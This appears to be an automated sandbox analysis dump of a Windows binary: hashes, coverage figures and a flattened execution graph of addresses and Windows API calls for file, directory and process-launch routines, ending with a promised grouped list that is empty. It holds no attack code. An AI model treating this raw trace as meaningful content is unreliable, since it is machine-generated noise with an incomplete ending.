• Opcode Fuzzy Hash: fc7f66a67da32abad67b56ad4d06c665252c48428ffbe5dda496a44f587a86b4
• Instruction Fuzzy Hash: 09A1E172E002158FDF25AFACDA856ACB7B1EF55310F1D4029E485BB2A1DB359E80CB71

Execution Graph

Execution Coverage: 11.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 14.7%
Total number of Nodes: 2000
Total number of Limit Nodes: 31
26709 7ff75455959c 26708->26709 26708->26710 26711 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26709->26711 26710->26699 26711->26704 26713 7ff754559840 26712->26713 26715 7ff754559869 26712->26715 26757 7ff75457a270 31 API calls 2 library calls 26713->26757 26715->26670 26717 7ff754553e28 swprintf 46 API calls 26716->26717 26718 7ff7545595eb 26717->26718 26719 7ff754560f68 WideCharToMultiByte 26718->26719 26720 7ff754559603 26719->26720 26721 7ff754559800 31 API calls 26720->26721 26722 7ff75455961b 26721->26722 26723 7ff754572320 _handle_error 8 API calls 26722->26723 26724 7ff75455962b 26723->26724 26724->26675 26724->26686 26726 7ff754579f4e 26725->26726 26727 7ff754579f36 26725->26727 26726->26727 26729 7ff754579f58 26726->26729 26752 7ff75457d69c 15 API calls abort 26727->26752 26754 7ff754577ef0 35 API calls 2 library calls 26729->26754 26730 7ff754579f3b 26753 7ff7545778e4 31 API calls _invalid_parameter_noinfo 26730->26753 26733 7ff754579f69 __scrt_get_show_window_mode 26755 7ff754577e70 15 API calls _set_fmode 26733->26755 26734 7ff754572320 _handle_error 8 API calls 26735 7ff754553e69 26734->26735 26735->26695 26737 7ff754579fd4 26756 7ff7545782f8 46 API calls 3 library calls 26737->26756 26739 7ff754579fdd 26740 7ff754579fe5 26739->26740 26741 7ff75457a014 26739->26741 26742 7ff75457d90c __free_lconv_mon 15 API calls 26740->26742 26743 7ff75457a06c 26741->26743 26744 7ff75457a023 26741->26744 26745 7ff75457a092 26741->26745 26747 7ff75457a01a 26741->26747 26751 7ff754579f46 26742->26751 26748 7ff75457d90c __free_lconv_mon 15 API calls 26743->26748 26746 7ff75457d90c __free_lconv_mon 15 API calls 26744->26746 26745->26743 26749 7ff75457a09c 26745->26749 26746->26751 26747->26743 26747->26744 26748->26751 26750 7ff75457d90c __free_lconv_mon 15 API calls 26749->26750 26750->26751 26751->26734 26752->26730 26753->26751 26754->26733 26755->26737 26756->26739 26757->26715 26770 7ff7545413a4 26758->26770 26761 7ff754542494 26762 7ff75454129c 
33 API calls 26761->26762 26763 7ff7545424a2 26762->26763 26764 7ff7545424dd 26763->26764 26767 7ff754542505 26763->26767 26765 7ff754572320 _handle_error 8 API calls 26764->26765 26766 7ff7545424f3 26765->26766 26766->26290 26768 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26767->26768 26769 7ff75454250a 26768->26769 26771 7ff7545413ad 26770->26771 26772 7ff75454142d GetWindowTextW 26770->26772 26773 7ff7545413ce 26771->26773 26774 7ff75454143d 26771->26774 26772->26761 26778 7ff7545413db __scrt_get_show_window_mode 26773->26778 26780 7ff7545721d0 26773->26780 26790 7ff754542018 33 API calls std::_Xinvalid_argument 26774->26790 26789 7ff75454197c 31 API calls _invalid_parameter_noinfo_noreturn 26778->26789 26781 7ff7545721db 26780->26781 26782 7ff7545721f4 26781->26782 26783 7ff75457bbc0 abort 2 API calls 26781->26783 26784 7ff7545721fa 26781->26784 26782->26778 26783->26781 26785 7ff754572205 26784->26785 26791 7ff754572f7c RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 26784->26791 26792 7ff754541f80 33 API calls 3 library calls 26785->26792 26788 7ff75457220b 26789->26772 26791->26785 26792->26788 26793->26306 26795->26315 26803 7ff754559638 26796->26803 26799 7ff7545597d9 26801 7ff754572320 _handle_error 8 API calls 26799->26801 26800 7ff754559800 31 API calls 26800->26799 26802 7ff7545597f2 26801->26802 26802->26327 26802->26328 26804 7ff754559692 26803->26804 26812 7ff754559730 26803->26812 26805 7ff754560f68 WideCharToMultiByte 26804->26805 26806 7ff7545596c0 26804->26806 26805->26806 26811 7ff7545596ef 26806->26811 26813 7ff75455aa88 45 API calls _snwprintf 26806->26813 26807 7ff754572320 _handle_error 8 API calls 26808 7ff754559764 26807->26808 26808->26799 26808->26800 26814 7ff75457a270 31 API calls 2 library calls 26811->26814 26812->26807 26813->26811 26814->26812 26831 7ff75455d4d0 26815->26831 26819 7ff754579ef0 swprintf 46 API calls 26821 7ff75455d8e5 _snwprintf 26819->26821 26820 
7ff75455d9a3 26823 7ff75455da17 26820->26823 26825 7ff75455da3f 26820->26825 26821->26819 26828 7ff75455d974 26821->26828 26845 7ff754549d78 33 API calls 26821->26845 26824 7ff754572320 _handle_error 8 API calls 26823->26824 26826 7ff75455da2b 26824->26826 26827 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26825->26827 26826->26333 26829 7ff75455da44 26827->26829 26828->26820 26846 7ff754549d78 33 API calls 26828->26846 26832 7ff75455d665 26831->26832 26834 7ff75455d502 26831->26834 26835 7ff75455cb80 26832->26835 26833 7ff754541744 33 API calls 26833->26834 26834->26832 26834->26833 26836 7ff75455cbb6 26835->26836 26843 7ff75455cc80 26835->26843 26837 7ff75455cbc6 26836->26837 26840 7ff75455cc7b 26836->26840 26842 7ff75455cc20 26836->26842 26837->26821 26847 7ff754541f80 33 API calls 3 library calls 26840->26847 26842->26837 26844 7ff7545721d0 33 API calls 26842->26844 26848 7ff754542004 33 API calls std::_Xinvalid_argument 26843->26848 26844->26837 26845->26821 26846->26820 26847->26843 26850 7ff75456ae3c GetMessageW 26849->26850 26851 7ff75456ae80 GetDlgItem 26849->26851 26852 7ff75456ae5b IsDialogMessageW 26850->26852 26853 7ff75456ae6a TranslateMessage DispatchMessageW 26850->26853 26851->26336 26851->26337 26852->26851 26852->26853 26853->26851 26855 7ff7545536b3 26854->26855 26856 7ff7545536e0 26855->26856 26858 7ff7545536cc CreateDirectoryW 26855->26858 26874 7ff7545532bc 26856->26874 26858->26856 26859 7ff75455377d 26858->26859 26861 7ff75455378d 26859->26861 26961 7ff754553d34 26859->26961 26865 7ff754572320 _handle_error 8 API calls 26861->26865 26862 7ff754553791 GetLastError 26862->26861 26867 7ff7545537b9 26865->26867 26867->26355 26868 7ff75455373b 26870 7ff754553774 26868->26870 26871 7ff7545537ce 26868->26871 26869 7ff754553720 CreateDirectoryW 26869->26868 26870->26859 26870->26862 26872 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26871->26872 26873 7ff7545537d3 26872->26873 26875 7ff7545532e7 GetFileAttributesW 
26874->26875 26876 7ff7545532e4 26874->26876 26877 7ff7545532f8 26875->26877 26878 7ff754553375 26875->26878 26876->26875 26879 7ff754556a0c 49 API calls 26877->26879 26880 7ff754572320 _handle_error 8 API calls 26878->26880 26881 7ff75455331f 26879->26881 26882 7ff754553389 26880->26882 26883 7ff75455333c 26881->26883 26884 7ff754553323 GetFileAttributesW 26881->26884 26882->26862 26888 7ff754556a0c 26882->26888 26883->26878 26885 7ff754553399 26883->26885 26884->26883 26886 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26885->26886 26887 7ff75455339e 26886->26887 26889 7ff754556a4b 26888->26889 26906 7ff754556a44 26888->26906 26891 7ff75454129c 33 API calls 26889->26891 26890 7ff754572320 _handle_error 8 API calls 26892 7ff75455371c 26890->26892 26893 7ff754556a76 26891->26893 26892->26868 26892->26869 26894 7ff754556cc7 26893->26894 26895 7ff754556a96 26893->26895 26896 7ff7545562dc 35 API calls 26894->26896 26897 7ff754556ab0 26895->26897 26919 7ff754556b49 26895->26919 26900 7ff754556ce6 26896->26900 26898 7ff7545570ab 26897->26898 26975 7ff75454c098 33 API calls 2 library calls 26897->26975 26983 7ff754542004 33 API calls std::_Xinvalid_argument 26898->26983 26899 7ff754556eef 26902 7ff7545570cf 26899->26902 26980 7ff75454c098 33 API calls 2 library calls 26899->26980 26900->26899 26903 7ff754556d1b 26900->26903 26958 7ff754556b44 26900->26958 26986 7ff754542004 33 API calls std::_Xinvalid_argument 26902->26986 26909 7ff7545570bd 26903->26909 26978 7ff75454c098 33 API calls 2 library calls 26903->26978 26904 7ff7545570b1 26917 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26904->26917 26906->26890 26907 7ff754556b03 26920 7ff754541fa0 31 API calls 26907->26920 26927 7ff754556b15 BuildCatchObjectHelperInternal 26907->26927 26984 7ff754542004 33 API calls std::_Xinvalid_argument 26909->26984 26910 7ff7545570d5 26912 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26910->26912 26918 7ff7545570db 26912->26918 26913 
7ff7545570a6 26924 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26913->26924 26914 7ff754556f56 26981 7ff7545411cc 33 API calls BuildCatchObjectHelperInternal 26914->26981 26925 7ff7545570b7 26917->26925 26931 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26918->26931 26926 7ff75454129c 33 API calls 26919->26926 26919->26958 26920->26927 26922 7ff7545570c3 26934 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26922->26934 26923 7ff754541fa0 31 API calls 26923->26958 26924->26898 26929 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26925->26929 26932 7ff754556bbe 26926->26932 26927->26923 26928 7ff754556f69 26982 7ff7545557ac 33 API calls BuildCatchObjectHelperInternal 26928->26982 26929->26909 26930 7ff754541fa0 31 API calls 26944 7ff754556df5 26930->26944 26935 7ff7545570e1 26931->26935 26976 7ff754555820 33 API calls 26932->26976 26937 7ff7545570c9 26934->26937 26985 7ff75454704c 47 API calls BuildCatchObjectHelperInternal 26937->26985 26938 7ff754556d76 BuildCatchObjectHelperInternal 26938->26922 26938->26930 26939 7ff754556bd3 26977 7ff75454e164 33 API calls 2 library calls 26939->26977 26940 7ff754541fa0 31 API calls 26943 7ff754556fec 26940->26943 26946 7ff754541fa0 31 API calls 26943->26946 26949 7ff754556e21 26944->26949 26979 7ff754541744 33 API calls 4 library calls 26944->26979 26945 7ff754556f79 BuildCatchObjectHelperInternal 26945->26918 26945->26940 26948 7ff754556ff6 26946->26948 26947 7ff754541fa0 31 API calls 26951 7ff754556c6d 26947->26951 26952 7ff754541fa0 31 API calls 26948->26952 26949->26937 26953 7ff75454129c 33 API calls 26949->26953 26954 7ff754541fa0 31 API calls 26951->26954 26952->26958 26955 7ff754556ec2 26953->26955 26954->26958 26957 7ff754542034 33 API calls 26955->26957 26956 7ff754556be9 BuildCatchObjectHelperInternal 26956->26925 26956->26947 26959 7ff754556edf 26957->26959 26958->26904 26958->26906 26958->26910 26958->26913 26960 7ff754541fa0 31 API calls 26959->26960 
26960->26958 26962 7ff754553d5b 26961->26962 26963 7ff754553d5e SetFileAttributesW 26961->26963 26962->26963 26964 7ff754553d74 26963->26964 26971 7ff754553df5 26963->26971 26965 7ff754556a0c 49 API calls 26964->26965 26967 7ff754553d99 26965->26967 26966 7ff754572320 _handle_error 8 API calls 26968 7ff754553e0a 26966->26968 26969 7ff754553dbc 26967->26969 26970 7ff754553d9d SetFileAttributesW 26967->26970 26968->26861 26969->26971 26972 7ff754553e1a 26969->26972 26970->26969 26971->26966 26973 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26972->26973 26974 7ff754553e1f 26973->26974 26975->26907 26976->26939 26977->26956 26978->26938 26979->26949 26980->26914 26981->26928 26982->26945 26985->26902 26988 7ff75454713b 26987->26988 26989 7ff754547206 26987->26989 26993 7ff75454714b BuildCatchObjectHelperInternal 26988->26993 26996 7ff754543f48 33 API calls 2 library calls 26988->26996 26997 7ff75454704c 47 API calls BuildCatchObjectHelperInternal 26989->26997 26991 7ff75454720b 26994 7ff754547273 26991->26994 26998 7ff75454889c 8 API calls BuildCatchObjectHelperInternal 26991->26998 26993->26371 26994->26371 26996->26993 26997->26991 26998->26991 27000 7ff754552102 26999->27000 27001 7ff7545520ea 26999->27001 27002 7ff754552126 27000->27002 27005 7ff75454b544 99 API calls 27000->27005 27001->27000 27003 7ff7545520f6 FindCloseChangeNotification 27001->27003 27002->26395 27003->27000 27005->27002 27007 7ff75456aa2f 27006->27007 27008 7ff75456aa36 27006->27008 27007->26546 27008->27007 27146 7ff754541744 33 API calls 4 library calls 27008->27146 27010->26546 27012 7ff75456a47f 27011->27012 27033 7ff75456a706 27011->27033 27147 7ff75456cdf8 33 API calls 27012->27147 27014 7ff754572320 _handle_error 8 API calls 27016 7ff75456a717 27014->27016 27015 7ff75456a49e 27017 7ff75454129c 33 API calls 27015->27017 27016->26479 27018 7ff75456a4de 27017->27018 27019 7ff75454129c 33 API calls 27018->27019 27020 7ff75456a517 27019->27020 27021 7ff75454129c 33 API calls 
27020->27021 27022 7ff75456a54a 27021->27022 27148 7ff75456a834 33 API calls _invalid_parameter_noinfo_noreturn 27022->27148 27024 7ff75456a734 27025 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27024->27025 27026 7ff75456a73a 27025->27026 27027 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27026->27027 27028 7ff75456a740 27027->27028 27030 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27028->27030 27029 7ff75456a573 27029->27024 27029->27026 27029->27028 27031 7ff7545420b0 33 API calls 27029->27031 27034 7ff75456a685 27029->27034 27032 7ff75456a746 27030->27032 27031->27034 27036 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27032->27036 27033->27014 27034->27032 27034->27033 27035 7ff75456a72f 27034->27035 27038 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27035->27038 27037 7ff75456a74c 27036->27037 27039 7ff75454255c 61 API calls 27037->27039 27038->27024 27040 7ff75456a795 27039->27040 27041 7ff75456a7b1 27040->27041 27042 7ff75456a801 SetDlgItemTextW 27040->27042 27046 7ff75456a7a1 27040->27046 27043 7ff754572320 _handle_error 8 API calls 27041->27043 27042->27041 27044 7ff75456a827 27043->27044 27044->26479 27045 7ff75456a7ad 27045->27041 27047 7ff75456a7b7 EndDialog 27045->27047 27046->27041 27046->27045 27149 7ff75455bb00 102 API calls 27046->27149 27047->27041 27055 7ff75456f529 __scrt_get_show_window_mode 27049->27055 27070 7ff75456f87d 27049->27070 27050 7ff754541fa0 31 API calls 27051 7ff75456f89c 27050->27051 27052 7ff754572320 _handle_error 8 API calls 27051->27052 27053 7ff75456f8a8 27052->27053 27053->26482 27054 7ff75456f684 27057 7ff75454129c 33 API calls 27054->27057 27055->27054 27150 7ff7545613c4 CompareStringW 27055->27150 27058 7ff75456f6c0 27057->27058 27059 7ff7545532a8 51 API calls 27058->27059 27060 7ff75456f6ca 27059->27060 27061 7ff754541fa0 31 API calls 27060->27061 27065 7ff75456f6d5 27061->27065 27062 7ff75456f742 ShellExecuteExW 27063 7ff75456f755 
27062->27063 27064 7ff75456f846 27062->27064 27067 7ff75456f7e3 CloseHandle 27063->27067 27071 7ff75456f78e 27063->27071 27076 7ff75456f781 ShowWindow 27063->27076 27069 7ff75456f8fb 27064->27069 27064->27070 27065->27062 27066 7ff75454129c 33 API calls 27065->27066 27068 7ff75456f717 27066->27068 27074 7ff75456f801 27067->27074 27075 7ff75456f7f2 27067->27075 27151 7ff754555b60 53 API calls 2 library calls 27068->27151 27073 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27069->27073 27070->27050 27152 7ff75456fe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 27071->27152 27079 7ff75456f900 27073->27079 27074->27064 27083 7ff75456f837 ShowWindow 27074->27083 27153 7ff7545613c4 CompareStringW 27075->27153 27076->27071 27078 7ff75456f725 27082 7ff754541fa0 31 API calls 27078->27082 27081 7ff75456f7a6 27081->27067 27085 7ff75456f7b4 GetExitCodeProcess 27081->27085 27084 7ff75456f72f 27082->27084 27083->27064 27084->27062 27085->27067 27086 7ff75456f7c7 27085->27086 27086->27067 27087->26546 27088->26546 27089->26546 27090->26546 27091->26546 27092->26546 27093->26546 27094->26546 27095->26546 27096->26546 27098 7ff7545572ea 27097->27098 27154 7ff75454b3a8 27098->27154 27101->26546 27103 7ff7545531e7 DeleteFileW 27102->27103 27104 7ff7545531e4 27102->27104 27105 7ff7545531fd 27103->27105 27106 7ff75455327c 27103->27106 27104->27103 27108 7ff754556a0c 49 API calls 27105->27108 27107 7ff754572320 _handle_error 8 API calls 27106->27107 27109 7ff754553291 27107->27109 27110 7ff754553222 27108->27110 27109->26546 27111 7ff754553243 27110->27111 27112 7ff754553226 DeleteFileW 27110->27112 27111->27106 27113 7ff7545532a1 27111->27113 27112->27111 27114 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27113->27114 27115 7ff7545532a6 27114->27115 27117->26546 27118->26546 27119->26546 27120->26546 27122 7ff754557e0c 27121->27122 27123 7ff754557e23 27122->27123 27124 7ff754557e55 27122->27124 27126 7ff75454129c 33 API 
calls 27123->27126 27158 7ff75454704c 47 API calls BuildCatchObjectHelperInternal 27124->27158 27128 7ff754557e47 27126->27128 27127 7ff754557e5a 27128->26546 27129->26546 27130->26546 27134 7ff75455d25e 27131->27134 27132 7ff75455d292 27132->26537 27133 7ff754541744 33 API calls 27133->27134 27134->27132 27134->27133 27135->26439 27136->26426 27138->26405 27139->26409 27140->26411 27141->26462 27142->26452 27144->26458 27146->27008 27147->27015 27148->27029 27149->27045 27150->27054 27151->27078 27152->27081 27153->27074 27157 7ff75454b3f2 __scrt_get_show_window_mode 27154->27157 27155 7ff754572320 _handle_error 8 API calls 27156 7ff75454b4b6 27155->27156 27156->26546 27157->27155 27158->27127 27215 7ff7545586ec 27159->27215 27161 7ff75454e3c4 27221 7ff75454e600 27161->27221 27163 7ff75454e4d4 27166 7ff7545721d0 33 API calls 27163->27166 27164 7ff75454e549 27167 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27164->27167 27165 7ff75454e454 27165->27163 27165->27164 27169 7ff75454e4f0 27166->27169 27175 7ff75454e54e 27167->27175 27227 7ff754563148 102 API calls 27169->27227 27170 7ff75454e51d 27171 7ff754572320 _handle_error 8 API calls 27170->27171 27173 7ff75454e52d 27171->27173 27172 7ff7545518c2 27174 7ff75455190d 27172->27174 27176 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27172->27176 27173->26554 27174->26554 27175->27172 27175->27174 27177 7ff754541fa0 31 API calls 27175->27177 27178 7ff75455193b 27176->27178 27177->27175 27183 7ff75454e7ea 27179->27183 27180 7ff75454e864 27182 7ff75454e8a1 27180->27182 27184 7ff75454e993 27180->27184 27190 7ff75454e900 27182->27190 27235 7ff75454f578 27182->27235 27183->27180 27183->27182 27228 7ff754553ec8 27183->27228 27185 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27184->27185 27187 7ff75454e998 27185->27187 27186 7ff754572320 _handle_error 8 API calls 27189 7ff75454e97e 27186->27189 27193 7ff75454e578 27189->27193 27192 7ff75454e955 27190->27192 27271 7ff7545428a4 82 
API calls 2 library calls 27190->27271 27192->27186 28275 7ff7545515d8 27193->28275 27196 7ff75454e59e 27198 7ff754541fa0 31 API calls 27196->27198 27197 7ff754561870 108 API calls 27197->27196 27199 7ff75454e5b7 27198->27199 27200 7ff754541fa0 31 API calls 27199->27200 27201 7ff75454e5c3 27200->27201 27202 7ff754541fa0 31 API calls 27201->27202 27203 7ff75454e5cf 27202->27203 27204 7ff75455878c 108 API calls 27203->27204 27205 7ff75454e5db 27204->27205 27206 7ff754541fa0 31 API calls 27205->27206 27207 7ff75454e5e4 27206->27207 27208 7ff754541fa0 31 API calls 27207->27208 27212 7ff75454e5ed 27208->27212 27209 7ff7545518c2 27210 7ff75455190d 27209->27210 27213 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27209->27213 27210->26558 27211 7ff754541fa0 31 API calls 27211->27212 27212->27209 27212->27210 27212->27211 27214 7ff75455193b 27213->27214 27216 7ff75455870a 27215->27216 27217 7ff7545721d0 33 API calls 27216->27217 27218 7ff75455872f 27217->27218 27219 7ff7545721d0 33 API calls 27218->27219 27220 7ff754558759 27219->27220 27220->27161 27222 7ff75454e627 27221->27222 27226 7ff75454e62c BuildCatchObjectHelperInternal 27221->27226 27223 7ff754541fa0 31 API calls 27222->27223 27223->27226 27224 7ff75454e668 BuildCatchObjectHelperInternal 27224->27165 27225 7ff754541fa0 31 API calls 27225->27224 27226->27224 27226->27225 27227->27170 27229 7ff7545572cc 8 API calls 27228->27229 27230 7ff754553ee1 27229->27230 27234 7ff754553f0f 27230->27234 27272 7ff7545540bc 27230->27272 27233 7ff754553efa FindClose 27233->27234 27234->27183 27236 7ff75454f598 _snwprintf 27235->27236 27311 7ff754542950 27236->27311 27239 7ff75454f5cc 27243 7ff75454f5fc 27239->27243 27326 7ff7545433e4 27239->27326 27242 7ff75454f5f8 27242->27243 27358 7ff754543ad8 27242->27358 27577 7ff754542c54 27243->27577 27250 7ff75454f7cb 27368 7ff75454f8a4 27250->27368 27252 7ff754548d04 33 API calls 27253 7ff75454f662 27252->27253 27597 7ff754557918 48 API calls 2 library calls 27253->27597 
27255 7ff75454f677 27257 7ff754553ec8 55 API calls 27255->27257 27261 7ff75454f6ad 27257->27261 27258 7ff75454f842 27258->27243 27389 7ff7545469f8 27258->27389 27400 7ff75454f930 27258->27400 27264 7ff75454f89a 27261->27264 27265 7ff75454f74d 27261->27265 27268 7ff754553ec8 55 API calls 27261->27268 27598 7ff754557918 48 API calls 2 library calls 27261->27598 27266 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27264->27266 27265->27250 27265->27264 27267 7ff75454f895 27265->27267 27270 7ff75454f8a0 27266->27270 27269 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27267->27269 27268->27261 27269->27264 27271->27192 27273 7ff7545540f9 FindFirstFileW 27272->27273 27274 7ff7545541d2 FindNextFileW 27272->27274 27276 7ff7545541f3 27273->27276 27279 7ff75455411e 27273->27279 27274->27276 27277 7ff7545541e1 GetLastError 27274->27277 27278 7ff754554211 27276->27278 27282 7ff7545420b0 33 API calls 27276->27282 27296 7ff7545541c0 27277->27296 27286 7ff75454129c 33 API calls 27278->27286 27280 7ff754556a0c 49 API calls 27279->27280 27281 7ff754554144 27280->27281 27284 7ff754554167 27281->27284 27285 7ff754554148 FindFirstFileW 27281->27285 27282->27278 27283 7ff754572320 _handle_error 8 API calls 27287 7ff754553ef4 27283->27287 27284->27276 27289 7ff7545541af GetLastError 27284->27289 27291 7ff754554314 27284->27291 27285->27284 27288 7ff75455423b 27286->27288 27287->27233 27287->27234 27298 7ff754558090 27288->27298 27289->27296 27293 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27291->27293 27294 7ff75455431a 27293->27294 27295 7ff75455430f 27297 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27295->27297 27296->27283 27297->27291 27299 7ff7545580a5 27298->27299 27302 7ff754558188 27299->27302 27301 7ff754554249 27301->27295 27301->27296 27303 7ff754558326 27302->27303 27306 7ff7545581ba 27302->27306 27310 7ff75454704c 47 API calls BuildCatchObjectHelperInternal 27303->27310 27305 7ff75455832b 27308 7ff7545581d4 
BuildCatchObjectHelperInternal 27306->27308 27309 7ff7545558a4 33 API calls 2 library calls 27306->27309 27308->27301 27309->27308 27310->27305 27312 7ff75454296c 27311->27312 27313 7ff7545586ec 33 API calls 27312->27313 27314 7ff75454298d 27313->27314 27315 7ff7545721d0 33 API calls 27314->27315 27319 7ff754542ac2 27314->27319 27317 7ff754542ab0 27315->27317 27317->27319 27599 7ff7545491c8 27317->27599 27606 7ff754554d04 27319->27606 27321 7ff754552ca8 27638 7ff7545524c0 27321->27638 27323 7ff754552cc5 27323->27239 27657 7ff7545528d0 27326->27657 27327 7ff754543674 27676 7ff7545428a4 82 API calls 2 library calls 27327->27676 27329 7ff754543431 __scrt_get_show_window_mode 27335 7ff754543601 27329->27335 27337 7ff75454344e 27329->27337 27662 7ff754552bb0 27329->27662 27330 7ff7545469f8 132 API calls 27332 7ff754543682 27330->27332 27332->27330 27333 7ff75454370c 27332->27333 27332->27335 27357 7ff754552aa0 101 API calls 27332->27357 27333->27335 27338 7ff754543740 27333->27338 27677 7ff7545428a4 82 API calls 2 library calls 27333->27677 27335->27242 27336 7ff7545435cb 27336->27337 27339 7ff7545435d7 27336->27339 27337->27327 27337->27332 27338->27335 27341 7ff75454384d 27338->27341 27356 7ff754552bb0 101 API calls 27338->27356 27339->27335 27342 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27339->27342 27340 7ff7545434eb 27340->27336 27671 7ff754552aa0 27340->27671 27341->27335 27344 7ff7545420b0 33 API calls 27341->27344 27343 7ff754543891 27342->27343 27343->27242 27344->27335 27345 7ff7545469f8 132 API calls 27347 7ff75454378e 27345->27347 27347->27345 27348 7ff754543803 27347->27348 27350 7ff754552aa0 101 API calls 27347->27350 27352 7ff754552aa0 101 API calls 27348->27352 27349 7ff7545528d0 104 API calls 27349->27336 27350->27347 27352->27341 27355 7ff7545528d0 104 API calls 27355->27340 27356->27347 27357->27332 27359 7ff754543b55 27358->27359 27360 7ff754543af9 27358->27360 27362 7ff754572320 _handle_error 8 API calls 27359->27362 27689 
7ff754543378 27360->27689 27364 7ff754543b67 27362->27364 27364->27250 27364->27252 27365 7ff754543b6c 27366 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27365->27366 27367 7ff754543b71 27366->27367 27917 7ff75455886c 27368->27917 27370 7ff75454f8ba 27921 7ff75455ef60 GetSystemTime SystemTimeToFileTime 27370->27921 27373 7ff754560994 27374 7ff754570340 27373->27374 27375 7ff754557df4 47 API calls 27374->27375 27376 7ff754570373 27375->27376 27377 7ff75455aae0 48 API calls 27376->27377 27378 7ff754570387 27377->27378 27379 7ff75455da98 48 API calls 27378->27379 27380 7ff754570397 27379->27380 27381 7ff754541fa0 31 API calls 27380->27381 27382 7ff7545703a2 27381->27382 27930 7ff75456fc68 49 API calls 2 library calls 27382->27930 27384 7ff7545703b8 27390 7ff754546a0e 27389->27390 27394 7ff754546a0a 27389->27394 27399 7ff754552bb0 101 API calls 27390->27399 27391 7ff754546a1b 27392 7ff754546a3e 27391->27392 27393 7ff754546a2f 27391->27393 27993 7ff754545130 130 API calls 2 library calls 27392->27993 27393->27394 27931 7ff754545e24 27393->27931 27394->27258 27397 7ff754546a3c 27397->27394 27994 7ff75454466c 82 API calls 27397->27994 27399->27391 27401 7ff75454f978 27400->27401 27405 7ff75454f9b0 27401->27405 27460 7ff75454fa34 27401->27460 28103 7ff75456612c 137 API calls 3 library calls 27401->28103 27403 7ff754551189 27406 7ff75455118e 27403->27406 27407 7ff7545511e1 27403->27407 27404 7ff754572320 _handle_error 8 API calls 27408 7ff7545511c4 27404->27408 27405->27403 27410 7ff75454f9d0 27405->27410 27405->27460 27406->27460 28152 7ff75454dd08 179 API calls 27406->28152 27407->27460 28153 7ff75456612c 137 API calls 3 library calls 27407->28153 27408->27258 27410->27460 28024 7ff754549bb0 27410->28024 27413 7ff75454fad6 28037 7ff754555ef8 27413->28037 27460->27404 27578 7ff754542c74 27577->27578 27582 7ff754542c88 27577->27582 27578->27582 28270 7ff754542d80 108 API calls _invalid_parameter_noinfo_noreturn 27578->28270 27579 7ff754541fa0 31 API calls 
27581 7ff754542ca1 27579->27581 27584 7ff754542d64 27581->27584 28248 7ff754543090 27581->28248 27582->27579 27586 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27584->27586 27585 7ff754542d08 27587 7ff754543090 31 API calls 27585->27587 27588 7ff754542d7c 27586->27588 27589 7ff754542d14 27587->27589 27590 7ff754541fa0 31 API calls 27589->27590 27591 7ff754542d20 27590->27591 28256 7ff75455878c 27591->28256 27597->27255 27598->27261 27616 7ff7545556a4 27599->27616 27601 7ff7545491df 27619 7ff75455b788 27601->27619 27605 7ff754549383 27605->27319 27607 7ff754554d32 __scrt_get_show_window_mode 27606->27607 27634 7ff754554bac 27607->27634 27609 7ff754554d90 27611 7ff754572320 _handle_error 8 API calls 27609->27611 27610 7ff754554d54 27610->27609 27612 7ff754554dae 27610->27612 27613 7ff754542b32 27611->27613 27614 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 27612->27614 27613->27239 27613->27321 27615 7ff754554db3 27614->27615 27625 7ff7545556e8 27616->27625 27620 7ff7545413a4 33 API calls 27619->27620 27621 7ff754549365 27620->27621 27622 7ff754549a28 27621->27622 27623 7ff7545556e8 2 API calls 27622->27623 27624 7ff754549a36 27623->27624 27624->27605 27626 7ff7545556fe __scrt_get_show_window_mode 27625->27626 27629 7ff75455eba4 27626->27629 27632 7ff75455eb58 GetCurrentProcess GetProcessAffinityMask 27629->27632 27633 7ff7545556de 27632->27633 27633->27601 27635 7ff754554c27 27634->27635 27637 7ff754554c2f BuildCatchObjectHelperInternal 27634->27637 27636 7ff754541fa0 31 API calls 27635->27636 27636->27637 27637->27610 27640 7ff7545524fd CreateFileW 27638->27640 27641 7ff7545525ae GetLastError 27640->27641 27650 7ff75455266e 27640->27650 27642 7ff754556a0c 49 API calls 27641->27642 27643 7ff7545525dc 27642->27643 27644 7ff7545525e0 CreateFileW GetLastError 27643->27644 27651 7ff75455262c 27643->27651 27644->27651 27645 7ff7545526b1 SetFileTime 27649 7ff7545526cf 27645->27649 27646 7ff754552708 27647 7ff754572320 _handle_error 8 API 
Call graph (Joe Sandbox IDA plugin) for the image loaded at 00007FF754540000 in process 3. The rendered node-ID/edge list is not reproduced; the nodes that call a Windows API or a named CRT symbol, grouped by the caller region they sit under in the graph, are:

